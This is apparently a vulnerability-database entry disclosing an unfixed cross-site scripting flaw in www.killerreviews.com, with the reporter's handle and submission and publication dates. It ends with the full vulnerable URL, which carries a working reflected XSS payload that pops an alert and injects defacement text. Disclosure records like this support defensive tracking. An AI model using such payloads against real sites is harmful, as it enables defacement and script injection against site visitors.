Unfixed XSS vulnerability at www.killerreviews.com

ID XSSED:56973
Type xssed
Reporter m4luck0
Modified 2011-12-24T00:00:00


Security researcher m4luck0, has submitted on 14/01/2009 a cross-site-scripting (XSS) vulnerability affecting www.killerreviews.com, which at the time of submission ranked 431755 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.killerreviews.com/review.asp?id=<script>alert("XSS%20by%20m4luck0")</script><center><font%20size=99%20color=red%20><b>%20h4ck3d%20by%20m4luck0%20</b></font></center>